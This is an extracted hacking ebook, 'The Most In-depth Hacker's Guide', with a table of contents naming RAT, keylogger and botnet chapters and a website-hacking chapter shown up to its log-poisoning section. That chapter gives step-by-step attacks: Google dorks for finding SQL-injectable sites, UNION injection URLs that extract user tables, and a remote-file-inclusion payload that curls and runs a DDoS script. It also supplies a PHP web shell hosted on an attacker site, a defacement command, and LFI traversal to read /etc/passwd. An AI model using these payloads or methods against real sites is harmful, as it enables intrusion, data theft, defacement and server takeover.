the most indepth hacker's guide - pdf.ebook777.compdf.ebook777.com/038/b019cwaa9w.pdf · the...
TRANSCRIPT
TheMostIn-depthHacker’sGuide-By:DawoodKhanaka,“Aleri0nV0RT3X”(Volume:1)
BookorVolume“TheMost In-DepthHacker’sGuide:Volume: 1” is tremendously complex towrite, particularlywithout support of the Almighty GOD Allah. I express heartfelt credit to My Parents without them I have noexistence.IammorethaneverthankfultomyteacherSir.KhairUllahfor the inspirationwhichIgot towrite thebook.Iamalsothankfultomyfriendsandpartnerwhofacilitatedme.Tofinish,Iamthankfultoyoualsoasyouarereading thisbook.Iamsure thiswillbookmakecreativeandconstructiverole tobuildyour lifemoresecureandalertthaneverbefore.
WhoamI?Youmighthavecomeacross thetermethicalhacker?Thegoodguy?Yes,that’swhatexactlyIliketocallmyself.Forhackingyouneedtohaveabasicknowledgeofprogramming.Someoneaskedme,“Howdidyoutakeinterestinprogrammingandhacking?” It wasmore like an inspiration that I got frommy brother.My first everattemptatprogrammingwasmakingasimplepageinHTMLwithabig“Helloworld”init.Towhichofcoursemyfathersmiledandsaid,“welldone.”.Thencamehacking.Myhacking career started back in 2009. 7 years passedand there is still somuch tolearn.Mysoulpurposeofthisbookisnottosellitbuttoraiseawarenessofthedangerwefacetoday,andyes,tohelpteachpeopleaboutthehackers’tradition.:)
“Bylearningyouwillteach,byteachingyouwilllearn”
-LatinProverb
CopyrightNotice
This report may not be copied or reproduced unless specific permissionshave been personally given to you by the author Dawood Khan. Anyunauthorizeduse,distributing,reproducingisstrictlyprohibited.
LiabilityDisclaimer
The information provided in this eBook is to be used for educationalpurposesonly.TheeBookcreatorisinnowayresponsibleforanymisuseoftheinformationprovided.Allof the information in this eBook ismeant tohelp the reader develop a hacker defense attitude in order to prevent theattacksdiscussed. Innoway should youuse the information to cause anykindofdamagedirectlyorindirectly.Theword“Hack”or“Hacking”inthiseBook should be regarded as “Ethical Hack” / “Ethical hacking”respectively.Youimplementtheinformationgivenatyourownrisk.
This book is totally meant for providing information on “ComputerSecurity”,“ComputerProgramming”andotherrelatedtopicsandisnowayrelatedtowardstheterms“CRACKING”or“HACKING”(Unethical).
Fewarticles(tutorials) inthisbookmaycontaintheinformationrelatedto“Hacking Passwords” or “Hacking Email Accounts” (Or Similar terms).These are not the GUIDES of Hacking. They only provide informationabout the legalwaysof retrieving thepasswords.Youshallnotmisuse theinformation to gain unauthorized access. However you may try out thesehacks on your own computer at your own risk. Performinghack attempts(withoutpermission)oncomputersthatyoudonotownisillegal.
Someofthetricksprovidedbyusmaynolongerworkduetofixtureinthebugsthatenabledtheexploits.Theauthorisnotresponsibleforanydirector indirect damage caused due to the usage of the hacks provided in thebook.
ContentsTheMostIn-depthHacker’sGuide
ChapterOne:Introduction
WhatisaHacker?
TypesofHackers
WhatdoesittaketobecomeaHacker?
ChapterTwo:WebsiteHacking
UnderstandingSQLInjection
HowtoUse/CreateDorks
FindingColumns&theVulnerableColumns
ObtainingtheSQLVersion
ObtainingTablesandColumns
UnderstandingRFI
AdvancedRFIusingPHPstreams
UnderstandingLFI
ExploitingLFIVulnerabilities
UnderstandingXSS
XSSAttack
UnderstandingBrokenAuthenticationandSessionManagement
BruteForceAttack
SessionHijacking
UnderstandingDNSCachePoisoning
DNSBackground
Cachepoisoningwithoutresponseforgery
Blindresponseforgeryusingbirthdayattack
UnderstandingHeartbleed
HeartbleedVulnerability
TheImpactofHeartbleed
ScanningMethodology
ImpactonPopularWebsites
ChapterThree:RemoteAdministrationTool
WhatisaRAT?
HowtosetupRAT
Howisitbeingdistributed?
ChapterFour:Keylogger
WhatisaKeylogger?
KeyloggerApplications
HowtosetupKeylogger
RemotelyinstallingKeyloggerusingMeterpreter
ChapterFive:BotnetsandIRCBots
UnderstandingBotnetsandIRCBots
TypesofBotnets
FormationofBotnet/IRCBots
Typesofattacks
HowtosetupBotnet
HowtosetupIRCBotnet?
ChapterSix:Cryptography,Encryption,andDecryption
UnderstandingCryptography
HistoricalBackground(Cryptography)
DataEncryptionandDecryption
SymmetricandAsymmetricEncryption
SecureCommunicationsEqualsBetterPrivacy
CryptographicHashFunction
FilesEncryptionandDecryption
Term‘Crypter’(Encryptionsoftware)
ChapterSeven:IntroductiontoPenetrationTesting
WhatisPenetrationtest?
History(PenetrationTesting)
MultiplePenetrationTestingTools
HowtoConductPenetrationTesting?
ChapterEight:DecompilingandReverseEngineering
WhatisReverseEngineering?
ReasonsforReverseEngineering.
TypesofReverseEngineering.
SoftwareObfuscation
Whatare.NETDecompilers?
SometoolsforReverseEngineering
ChapterOne:Introduction
WhatisaHacker?
In the computer security context, a hacker is someone who likes to tinker withelectronics or computer systems.Hackers like to explore and learn how computersystemswork,findingwaystomakethemdowhattheydobetter,ordothingstheyweren’tintendedtodo.Hackersmaybemotivatedbyamultitudeofreasons,suchasprofit, protest, challenge, enjoyment, or to evaluate those weaknesses to assist inremovingthem.
Several subgroups of the computer underground with different attitudes usedifferent terms to demarcate themselves from each other, or try to exclude somespecificgroupwithwhomtheydonotagree.
TypesofHackers
WhiteHat:Theseareconsidered thegoodguys.Whitehathackersdon’tuse theirskillsforillegalpurposes.TheyusuallybecomeComputerSecurityexpertsandhelpprotectpeoplefromtheBlackHats.Theterm“whitehat”inInternetslangreferstoan ethical hacker. This classification also includes individuals who performpenetrationtestsandvulnerabilityassessmentswithinacontractualagreement.
“Awhitehathackerisacomputersecurityspecialistwhobreaksintoprotectedsystemsandnetworks to testand toaccess theirsecurity.Whitehathackersuse their skills toimprovesecuritybyexposingvulnerabilitiesbeforemalicioushackers(knownasblackhathackers)candetectandexploitthem.”-DefinitionfromTechopedia
BlackHat:Theseareconsidered thebadguys.Blackhathackersusuallyuse theirskillsmaliciouslyforpersonalgain.Theyarethepeoplethathackbanks,stealcreditcards,anddefacewebsites.Blackhathackersbreakintosecurenetworkstodestroy,modify,orstealdata;ortomakethenetworkunusableforthosewhoareauthorizedtousethenetwork.Blackhathackersarealsoreferredtoas the“crackers”withinthesecurity industryandbymodernprogrammers.Thesetwoterms(Whitehat&Blackhat)camefromtheoldwesternmovieswherethegoodguysworewhitehatsandthebadguysworeblackhats.
“Ablackhathackerisanindividualwithextensivecomputerknowledgewhosepurposeistobreachorbypassinternetsecurity.Blackhathackersarealsoknownascrackersordark-sidehackers.Thegeneralviewisthat,whilehackersbuildthings,crackersbreakthings.”-PCTools
GreyHat:Theterm“greyhat”or“grayhat”inInternetslangreferstoacomputerhackerorcomputersecurityexpertwhoseethicalstandardsfallsomewherebetweenpurelyaltruisticandpurelymalicious.Thetermbegantobeusedinthelate1990s,derivedfromtheconceptsof“whitehat”and“blackhat”hackers.Agreyhathackermay surf the Internet and hack into a computer system for the sole purpose ofnotifyingtheadministratorthattheirsystemhasasecuritydefect,forexample.Theymaythenoffertocorrectthedefectforafee.Eventhoughgreyhathackersmaynotnecessarilyperformhackingfortheirpersonalgain,unauthorizedaccesstoasystemcanbeconsideredillegalandunethical.
Neophyte:Aneophyte (“newbie”,or“noob”) is someonewho isnew tohacking or
phreakingandhasalmostnoknowledgeorexperienceoftheworkingsoftechnologyand hacking. The word neophyte means, “a person who is new to a subject oractivity.”.
ScriptKiddie:Theseare thewannabehackers.Theyare lookeddownupon in thehackercommunitybecausetheyarethepeoplethatmakehackers lookbad.Scriptkiddiesusuallyhavenohackingskillsandusethetoolsdevelopedbyotherhackerswithoutanyknowledgeofwhat’shappeningbehindthescenes.
IntermediateHackers:Thesepeopleusuallyknowaboutcomputers,networks, andhaveenoughprogrammingknowledgetounderstandrelativelywhatascriptmightdo,butlikethescriptkiddiestheyusepre-developedwell-knownexploits(-apieceofcodethattakesadvantageofabugorvulnerabilityinapieceofsoftwarethatallowsyoutotakecontrolofacomputersystem)tocarryoutattacks.
EliteHacker:Thesearetheskilledhackers.Theyaretheonesthatwrite themanyhacker tools and exploits out there. They can break into systems and hide theirtracksormakeitlooklikesomeoneelsedidit.Youshouldstrivetoeventuallyreachthislevel.ElitegroupssuchasMastersofDeceptionconferredakindofcredibilityontheirmembers.
Hacktivist:Ahacktivistisahackerwhoutilizestechnologytopublicizeasocial,ideological,religiousorpoliticalmessage.Hacktivismcanbedividedintotwomaingroups:
NationState:Intelligenceagenciesandcyber-warfareoperativesofnationstates.
OrganizedCriminalGangs:Groupsofhackersthatcarryoutorganizedcriminalactivitiesforprofit.
WhatdoesittaketobecomeaHacker?
Becoming a great hacker isn’t easy and it doesn’t happen quickly. Being creativehelpsalot.Thereismorethanonewayaproblemcanbesolved,andasahackeryouencountermanyproblems.Themorecreativeyouarethebiggerchanceyouhaveofhackingasystemwithoutbeingdetected.Anotherhugequalityyoumusthaveisthewill to learn because without it, you will get nowhere. Remember, Knowledge ispower.Patienceisalsoamustbecausemanytopicscanbedifficulttograspandonlyovertimewillyoumasterthem.
Thinkcreatively.Hackersarelikeartists,philosophers,andengineersallrolledupinto one. They believe in freedom and mutual responsibility. The world is full offascinatingproblemswaitingtobesolved.Hackerstakeaspecialdelight insolvingproblems,sharpeningtheirskills,andexercisingtheirintelligence.
Learntolovesolvingproblems.Noproblemshouldeverhavetobesolvedtwice.Thinkofitasacommunityinwhichthetimeofhackersisprecious.Hackersbelievesharing information is amoral responsibility.When you solve problems,make theinformationpublictohelpeveryonesolvethesameissue.
Learntorecognizeandfightauthority.Theenemyof thehacker isboredom,drudgery,andauthoritarianfigureswhousecensorshipandsecrecytostranglethefreedomofinformation.Monotonousworkkeepsthehackerfromhacking.
Be competent. Anyone who spends time on Reddit can write up a ridiculouscyberpunkusernameandposeasahacker.ButtheInternetisagreatequalizer,andvaluescompetenceoveregoandposture.Spendtimeworkingonyourcraftandnotyour image and you’ll more quickly gain respect than modeling yourself on thesuperficialthingswethinkof“hacking”inpopularculture.
ChapterTwo:WebsiteHacking
UnderstandingSQLInjection
SQLInjectionisoneoftoday’smostpowerfulmethodsofsystempenetration,usingerrorbasedqueriesoneisabletoextractdata(tables&columns)fromavulnerablesystem,namelythe(database).
BeginnerstendtobelievethatusingtoolscreatedbyadvancedSQLinjectionartistsarethebestwayaroundthings,pleasebelievethattheyaren’t,everythingseemsniceandeasywithtoolssuchas(BSQLiandSQLiHelper)whichtheyare,buttheusersposting the download links for both applications around the world on hackingforumshavebeenknowntoverysecurelyencryptthesetoolswithmaliciousfilesorbackdoors etc, I’ve experienced this firsthand when I first started out. Learningeverythingmanuallywillhelpyouunderstandtheenvironmentyouareattemptingtopenetrate,whilstexperimentingwithcommandsyouhave learntwillonlyhelpyoubecomemoreadvancedinSQLinjection,asfortricks,therearemanyarticlesnamed(CheatSheets)becausethisiswhattheyare,purposelycreatedforSQLinjectorstousecommandswhicharen’tnormallyspokenoforknownabout.
Requirements:WhenIfirststartedSQLinjectionpersonallyformeitwasn’ttohardtogetontheballandlearnquickly,thisisbecauseIhadpreviousknowledgeofweb-scripts,howtheinternetworks,andtheabilitytoreadandunderstandcomplicatedtutorials.Ibelieveit’sawholeloteasierifyouknowthebasicsofacomputersystemandhowtheinternetworks.Tolearnyoumustbeabletoreadandunderstandthetutorial or article provided and take on board everything you see.When I was abeginnerIfounditeasiertoattackwhilstreading,doeverythinginstages,don’treadthewholetutorialandgooffandexpecttoinjectoffthetopofyourhead.
HowtoUse/CreateDorks
ForbeginnersamethodoffindingwebsitesvulnerabletoSQLinjectionisusingwhatwe call “dorks”. Dorks: They are like search criteria in which a search enginereturnsresultsrelatedtoyourdork.Theprocesscanbealittletimeconsuming,buttheoutcomewillbeworthitafterlearningonhowtousedorks.Forthistutorial,thesearchenginewe’llbeusingisGoogle.
Step1:Forthistutorial,we’llbeusingthisdork“inurl:index.php?id=“.Here’swhatyou do: Navigate to http://www.google.com. Type the dork in the search bar“inurl:index.php?id=”(withorwithoutquotes).
Nowyou’llfindawholelotoflinksinyourresults.
Here’showyoucanspeedupyourprocess:Inyourmouse,thereshouldbeascrollbuttonright?Hoveryourmouseoneach linkandhit the scrollbutton so that it’llopenonanewtab.(Let’ssayyoucanopenabout10linksatatime).
Step2:NowtoseewhetherthewebsiteisvulnerabletoSQLinjectionornot,wesimplyputinaquote“‘“attheendoftheurladdress.Sooursitewilllooklikethis:
Dothesamethingwiththewebsitesyouopenedonyourtabsandseeifthere’sanyvulnerablewebsite.Todetermineifawebsiteisvulnerableornot,itshouldreturnanerror!
Step3:That’sall!Youhavejustdiscoveredavulnerablewebsiteandyoucannowexploitit.
Here’salistofdorks:
1.index.php?id=
2.trainers.php?id=
3.buy.php?category=
4.article.php?ID=
5.play_old.php?id=
6.declaration_more.php?decl_id=
7.pageid=
8.games.php?id=
9.page.php?file=
10.newsDetail.php?id=
11.gallery.php?id=
12.show.php?id=
13.staff_id=
14.newsitem.php?num=
15.readnews.php?id=
FindingColumns&theVulnerableColumns
AsInotedinthefirstsectionofthetutorialIadviseyoudoprettymucheverythingmanuallywithSQLinjection,sobyusingthefollowingcommands(providingthey’refollowedcorrectly)youwillbegintoseeresults innotime.If thesite isvulnerable,forexample:
Step1:Refertothefollowingtocheckinghowmanycolumnsthereare.(order+by)theorderbyfunctiontellsthedatabasetoordercolumnsbyaninteger(digite.g.1or2), no errors returnedmeans the column is there, if there’s an error returned thecolumnisn’tthere.
1. wxw.site.com/index.php?Client_id=23+order+by+1<NoError
2.wxw.site.com/index.php?Client_id=23+order+by+2<NoError
3.wxw.site.com/index.php?Client_id=23+order+by+3<NoError
4.wxw.site.com/index.php?Client_id=23+order+by+4<ERROR
Fromusingorder+by+ command and incrementing the number of each timeuntilthepagedisplaysanerroristheeasiestmethodtofindvulnerablecolumns,sofromtheexamplesabovewhenattemptingtoorderthecolumnsby4there’sanerror,andsocolumn4doesn’texist,sothere’s3columns.
Step2:Let’ssaywewereworkingonthesiteIusedabove,whichhas3columns.Wenow need to find out which of those three columns are vulnerable. VulnerablecolumnsallowustosubmitcommandsandqueriestotheSQLdatabasethroughtheURL.(union+select)selectsallcolumnsprovidedintheURLandreturnsthevalueofthevulnerablecolumne.g.
●wxw.site.com/index.php?Client_id=23+union+select+1,2,3
The site should refresh, not with an error but with some content missing and anumberisdisplayedonthepage,either1,2or3(asweselectedthethreecolumnsintheaboveURLtotestforcolumnvulnerability).Sometimesthepagewillreturnandlookcompletelynormal,whichisn’taproblem.
ObtainingtheSQLVersion
Easiersaidthandone,usingtheinformationfoundintheabovesectionse.g.amountofcolumnsandthevulnerablecolumn.Wenowuseacommand(@@version)andinsome cases a series of commands to determine what the SQL version is on thecurrent site. Version 4 or version 5. See the example below to view what a URLshould look like when the version command has been inserted into the URLreplacingthenumber2as2isthevulnerablecolumnontheexamplesite.
●wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3
Whatyouneedtolookforisaseriesofnumberse.g:5.0.89-community,4.0.45-log
Iftheabovefailsandthesitejustreturnsanerrorordisplaysnormallythenweneedtousetheconvertfunctioninorderfortheservertounderstandthecommand,don’tworry though this is usually the only thing youneed to convert and it’s on a rareoccasionwherethisisthecase.So,iftheexamplesitereturnedanerrorweneedtoreplace@@versionwiththeconvert()function:convert(@@versionusinglatin1)
Sotheexamplesitewillnowlooklikethis:
●wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@versionusinglatin1),3
ObtainingTablesandColumns
Step 1:Youwill notice that obtaining tables and columns from version 4MySQLservers isa littlemore timeconsumingandconfusingat timesaswehave toguesspretty much everything. Because version 5 is more up to date and hasinformation_schemawhichthedatabaseandtablesarestoredin,MySQLversion4doesn’t.ProvidingtheMySQLversionofthewebsiteis4,wemustdothefollowing.
So,backtotheexampleURL:
●wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3
WemustnowgobacktotheoriginalURLwhichis:
●wxw.site.com/index.php?Client_id=23+union+select+1,2,3
Step2:Thisiswheretheguessingbegins,weneedtoguesstablenames.HowcanwetellifthetablenameIguessexists?Thesameaswherewetestedfortheamountofcolumns. Ifno error isproduced then the table guessed exists. Is there is an errorthen the table guessed doesn’t exist, so just try another. So we use the (from)commandfollowedbythetablenameyouarelookingtoseeexists.Example:
●wxw.site.com/index.php?Client_id=23+union+select+1,2,3fromadmin
Step 3: We are now required to guess column names from the existing table. Sothinking logically,which labelled columns within this table would represent data?Columnssuchas:first_name,last_name,email,username,password,pass,user_id,etc.
Sowenowmustthinkbacktowhichcolumnisvulnerable(inthiscase2)andsowe’llusetheURLandreplace2withthecolumnnameyouareattemptingtoseeifexistsintheuserstable.Let’stryafewofthetypicalslistedabove:
1. wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3fromusers<
Error
2.wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3fromusers<Error
3.wxw.site.com/index.php?Client_id=23+union+select+1,address1,3fromusers<Error
4.wxw.site.com/index.php?Client_id=23+union+select+1,email,3fromusers<NoError
Fromtheabovewecanclearlyseethatthecolumnemailexistswithinthetableusers,thepageshouldreturndisplayingdata(mostprobablyanemailaddress)orthedatayouareextracting.
UnderstandingRFI
RemoteFileInclusion(RFI)isanattackthattargetsthecomputerserversthatrunWebsitesandtheirapplications.RFIexploitsaremostoftenattributedtothePHPprogramming language used by many large firms including Facebook andSugarCRM.However,RFIcanmanifestitselfinotherenvironmentsandwasinfactintroducedinitiallyas“SHTMLinjection”.RFIworksbyexploitingapplicationsthatdynamically reference external scripts indicated by user input without propersanitation.Itallowsanattackertoincludearemotefile,usuallythroughascriptonthewebserver.Thevulnerabilityoccursduetotheuseofuser-suppliedinputwithoutpropervalidation.
DetailedDescription
Remote File Inclusion (RFI) is caused by insufficient validation of user inputprovidedasparameterstoaWebapplication.ParametersthatarevulnerabletoRFIenableanattackertoincludecodefromaremotelyhostedfileinascriptexecutedontheapplication’sserver.Sincetheattacker’scodeisthusexecutedontheWebserverit might be used for temporary data theft or manipulation, or for a long termtakeoverofthevulnerableserver.
TheRFIattackvectorincludesaURLreferencetotheremotelyhostedcode.Mostattacks include two steps. In the first step, the attack vector references a simplevalidationscript,usuallycapableofprintingsomedistinguishedoutputtotheHTMLpage.Ifthevalidationscriptissuccessfullyexecutedbytheserverunderattack,thentheattackerproceedswithasecondvectorthatreferencestheactualpayloadscript.Theservershostingthescriptareeithercompromisedserversorfilesharingservices.
Step1:IncludedfileindicatesthattheapplicationisvulnerabletoRFI.Forexample:
●?php/*ZFxID*/echo(“Shiro”.“Hige”);die(“Shiro”.“Hige”);/*ZFxID*/?
Step2:Attackvectorincludestheactualpayloadscript.Forexample:
●?phpechoexec(‘cd/tmp;curl-Ohttp://www.yeshouse.net/column/js/ddos.txt;perlddos.txt;rm-rfddos.txt*;’);?
Prevention
ThemostcommonprotectionmechanismagainstRFIattacksisbasedonsignaturesfor known vulnerabilities in the Web Application Firewall (WAF). Detection andblocking of such attacks canbe enhancedby creating a blacklist of attack sourcesandablacklistofURLsofremotelyincludedmaliciousscripts:
1. AdvancedknowledgeofRFIattacksourcesenablestheWAFtoblockanattackbeforeitevenbegins.
2.AblacklistofthereferencedURLenablestheWAFtoblockexploitstargetingzero-dayvulnerabilitiesofapplications.
3.TheblacklistofIPsconstructedfromtheRFIattackobservationscouldbeusedtoblockothertypesofattacksissuedfromthesamemalicioussources.
UsingRFItoExploitWebsite
RFIisacommonvulnerabilityandtrustmeallwebsitehackingisnotexactlyaboutSQL injection. Using RFI you can literally deface the websites, get access to theserveranddoalmostanything.WhatmakesitmoredangerousisthatyouonlyneedtohaveyourcommonsenseandbasicknowledgeofPHPtoexecute thisone, someBASHmightcomehandyasmostofserverstodayarehostedonLinux.
StartingwithRFI
Let’sgetitstarted.Thefirststepistofindvulnerablesite,youcaneasilyfindthemusing Google dorks. If you don’t have any idea, you might want to read aboutadvancedpasswordhackingusingGoogle dorks or to use automated tool to applyGoogledorksusingGoogle.Nowlet’sassumewehavefoundavulnerablewebsite.
●http://victimsite.com/index.php?page=home
Asyoucansee, thiswebsitepullsdocumentsstoredintextformatfromserverandrenders them as web pages. We can find ways around it as it uses PHP includefunctiontopullthemout.Letscheckitout.
●http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
Ihave includedacustomscript“evilscript” intext formatfrommywebsite,whichcontainssomecode.Now,ifit’savulnerablewebsite,thenanyofthese3thingscanhappen.
1. You might have noticed that the url consisted of “page=home” had noextension,butIhaveincludedanextensioninmyurl,hencethesitemaygiveanerrorlike‘failuretoincludeevilscript.txt.txt’,thismighthappenasthesitemaybeautomaticallyaddingthe.txtextensiontothepagesstoredinserver.
2.Incase,itautomaticallyappendssomethinginthelinesof.phpthenwehavetouseanullbyte‘%00’inordertoavoiderror.
3.Successfulexecution.
Nowonceyouhavebattledaroundthisone,youmightwant to learnwhat tocodeinside the script.Youmaygetacustomcoded infamousC99script (toobloatybuthighly effective once deployed) or you might code yourself a new one. For thisknowledgeofPHPmightcomeinhandy.Herewego
<?php
echo“<script>alert(U4r30wn3d!!);</script>”;
echo“Runcommand:“.htmlspecialchars($_GET[‘cmd’]);
system($_GET[‘cmd’]);
?>
The above code allows you to exploit include function and tests if the site if RFI(XSS) vulnerable by running the alert box code and if successful, you can sendcustomcommandstothelinuxserverinbash.So,ifyouareinluckandifitworked,let’s try our hands on some Linux commands. For example, to find the currentworking directory of server and then to list files, we will be using ‘pwd’ and ‘ls’commands
●http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
●http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
What itdoes is that it sends thecommandascmdweput inourscriptandbeginsprinttheworkingdirectoryandlistthedocuments.Evenbetteryoucanalmostmakethepageproclaimthatyouhackeditbyusingthe‘echo’command.
●cmd=echoUrpwn3dbyAleri0n>index.php
It will then re-write the index.php and render it. In case, it’s a primitive websitewhichstorespageswith .txtextension,youmightwant toput itwithalong the .txtfiles.Nowasexpected,wearenowthealphaandtheomegaofthewebsite.Wecandownload, remove, rename, anything! Want to download stuff? Try the ‘wget’function.
AdvancedRFIusingPHPstreams
Streamsareawayofgeneralizingfile,network,datacompression,andotheroperationsthatshareacommonsetoffunctionsanduses.
AnattackermayusestreamstoexploitRFIvulnerableparameters.
Fromtheattackerperspective,therearetwomainadvantagesofusingalternativestreamsandwrappersinsteadofthe“normal”HTTPwrapper.
●Evasiontechnique–Somedefensemechanismsandfilters17blockonlytheuse“normal”wrappers.Usinganalternativewrapperwillevadethem.
●Somestreamseliminatetheneedforhostingthemaliciouscode,whichmakesthehackerworkeasy.
Attackexample:
Forexample,wewillusethedataPHPwrapper.
We will encode our PHP code () in base64 to get the following string“PD9waHAgcGhwaW5mbygpPz4=”thenwewillwrapwiththethedatawrapper–“data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=” and send it to thevulnerableapplication.
WehaveobservedtheuseofPHPwrappersinRFIexploitationinthewild,buttheyaremuchlessfrequentthanthetraditionalRFIexploits.
UnderstandingLFI
LocalFileInclusion(alsoknownasLFI)istheprocessofincludingfilesonaserverthrough the web browser. This vulnerability occurs when a page include is notproperly sanitized, and allows directory traversal characters to be injected. LFIexploitationmethodrequiresanadditionalvulnerability(withrespecttoRFI)intheapplicationtoallowtheexistenceofalocalmaliciousfile.
The reason that hackers bother with LFI attacks when they could use the moresimpleRFIattacks isdueauniqueproperty inPHPversion5.2.Specifically,PHPintroducedanadditionalcontrolmechanismoverremotefileincludeintheformofthe allow_url_include switch. The default value of the switch isOFF,which turnsapplicationsthatwerepreviouslyRFIvulnerabletobeonlyLFIvulnerable.
Since about 90% of deployed PHP enabled servers are of version 5.2 or above, itmakesLFIaveryrelevantoptionforhackers.
EventhoughLFIexploitationmethodsmaydifferfromRFIinthetechnicaldetails,theoutcomeisverysimilar–theattacker’scodeisexecutedonthewebserver.Thecodemight be used for temporary data theft ormanipulation, or for a long-termtakeoverofthevulnerableserver.
LFI vulnerability exploitation requires the malicious code to be hosted on thevulnerableserver.Therearetwomainpathstodothat.
● Abuse exiting filewrite functionalitywithin the server, typically done bymanipulatingtheservertowriteattackercontrolledstringsintothesystemlogfile.
● Abuseusergeneratedcontent fileupload functionality toembedmaliciouscodewithintheuploadedfile.
Let’screateanewscenario.Wegotthefollowingfiles/pages:
1. index.php
2.1.php
3.2.php
4.3.php
“index.php” is the file theusersaregoing tovisitwithhisbrowser.When theuserfirstvisitstheindex.phpwearegoingtodisplay3links.
<ahref=“index.php?page=1”>Page1</a>
<ahref=“index.php?page=2”>Page2</a>
<ahref=“index.php?page=3”>Page3</a>
Whentheuserclicksthefirstlinkit’sgoingtoshowthecontentof1.php,whentheuserclicksthesecondlinkit’sgoingtoshowthecontentsof2.phpandwhentheuserclicksthelastlinkit’sgoingtoshowthecontentsof3.php.
Theindex.phpscriptsitewouldinthiscaselooksomethinglikethis(notethatIamnowcodinglikeanidiottocreatesecurityholes):
if(isset($_GET[‘page’]))
{
//TheGETargumentispresent.Let’sincludethepage.
include($_GET[‘page’].“.php”);
}
else
{
//TheGETargumentisnotpresent.Let’sgivethepoorguysomelinks!
echo(‘<p><ahref=“index.php?page=1”>Page1</a></p>’);
echo(‘<p><ahref=“index.php?page=2”>Page2</a></p>’);
echo(‘<p><ahref=“index.php?page=3”>Page3</a></p>’);
}
The content of 1,2 and3 is not important in this example so Iwon’t say anythingaboutthat.
Now,whenauserclicksthePage1linkheorsheistakentowww.site.com/index.php?page=1
ThePHPscriptinindex.phpwillnowseethattheuserisrequestingthepagecalled1anditwillincludethenumberintheURLGETargument+“.php”thesamegoesfor2and3.
So,forPage1itwillinclude1.php,forPage2itwillinclude2.phpandforPage3itwillinclude3.php
Sofar,sogood.Right?Notreally.Theabovescriptisadeathtrap.Youmightnotseeit,butIdo.AndIwillshowyou.WhatifIweretogotoindex.php?page=4?Itwouldthentrytoinclude4.php.Butthatfileobviouslydoesnotexist.Sothepagewouldreturnanerrormessagelikethis:
●Warning:include(4.php)[function.include]:failedtoopenstream:NosuchfileordirectoryinPATHonlines3
It’simportanttonotethat,notallwebserverswillshowyouerrormessageswhenthereiserrors.Youcanchoosetonotshowuserserrormessagesonpurposesoit’shardertofindvulnerablepagesandtheygiveoutlessinformationaboutwhat’shappeninginthecode.Eitherway,let’sseewhatmorewecandowiththis.
Beforewecontinue:Furthernow,Iwillbeusinglinux/unixpaths(/var/log/).Andnotc:\blabla.Incaseofvulnerabilitiesonwindowsservers,theconceptremainsthesame.Justchangethepath.
IfIweretogotoindex.php?page=/etc/passwd%00whatwouldhappen?Thatsright,thePHPscriptwouldtrytoincludewhateverthefile/etc/passwdcontains.Andif
/etc/passwdwastocontainmorePHPcode,itwouldalsogetexecuted.MeaningwecanrunanyPHPcommand/functionontheserver.Whichmostdefinitelyisextremelydangerous.However,inthisexample(/etc/passwd)wewon’thaveanyPHPcode.Butitwillcontainalltheusersontheserver.The/etc/passwdistypicallythefileyouwilltrytoincludefirstinanyLFI,simplybecauseitwillalwaysbethereonlinuxservers.
Doyouseethe%00partintheargumentvalue?Yah,thatisnotatypo.Thisistogetridofthe‘PHP’partoftheincludecode.Everythingafter%00willbediscarded.
ExploitingLFIVulnerabilities
Let’ssaythatyouhavesuccessfullyfoundavulnerablepage.TheURLiswww.site2.com/index.php?page=index
FirstIwilldiscussthenormalmethodofLFIvulnerabilities.ThenIwillmoveontoslightlymoreinterestingmethodsofgainingsomesortofaccesstotheserver.Wegettoremember;eventhoughwemighthaveaLFIvulnerability.Thisdoesnotdirectlymeanwehavehackedourtarget,nordoesitguaranteeasuccessfulbreach.
Forthecaseofsimplicity.Wewillsaythatallweneedtodoiseditthepage=indexto/etc/passwdandwewillsuccessfullyinclude/etc/passwd.Nothingfancy.Inalotofcasesitwillbenecessarytodo../../../../../../../../../etc/passwdbecausethephpscriptwilltrytoincludesomethinginitsrootdirectory,thenweneedtogobacklotsoffolders(../../../)untilwereach/andthengotoetc/andreadpasswd.Howmany../‘syouusedoesnotmatter.Justuseenough.
Ifyou’reluckyenoughwww.site2.com/index.php?page=/etc/passwdshouldgiveusthisoutput:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:MailingListManager:/var/list:/bin/sh
Notethatyouwillnotgetthesameoutput(youmight,butprobablynot).Don’tworry.Aslongasyougetsomethinglookinglikethisyouaregood.
So,weknowthisserverforSUREisvulnerabletoLFI.Let’sdiscusshowwecangetsomeaccesstothisserver.Thefile/etc/shadowiswhatcontainsthesystem’sloginsnowadays.Butunlessthewebserverisrunningasroot(highestprivilegeuser)youwon’tbeabletoreadthatfile.Butyoushould/couldtryitnonetheless.
Furthermore,it’snotreallyanyeasywaygettingmoreaccessthanLFItoaserverwithnormalinclusion.Youcantrylurkingaroundabitandseeifyoufindanyinterestingfiles,youmightgetlucky.Butnormally,fromthispointonyoumoveontologpoisoning,/proc/self/environorothermethodsofattacks.
Logpoisoning
Afterknowingyoucanincludeanyfile(s)withaLFI.YoucouldtrylogpoisoningtoexecutePHPcodetogainhigheraccesstothesystem.
InordertoperformaLFIlogpoisoningyouneedtobeabletoincludetheapacheerrororandaccesslogs.UnfortunatelyforusIbelievethishavebeenmade“impossible”innewerversionsofapache(themostusedwebserver).Nonetheless.Itdoesnotstopusfromtrying.
First,tryincludingvariousknownlocationsfortheapachelogs.Hereareafewcommonpaths:
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
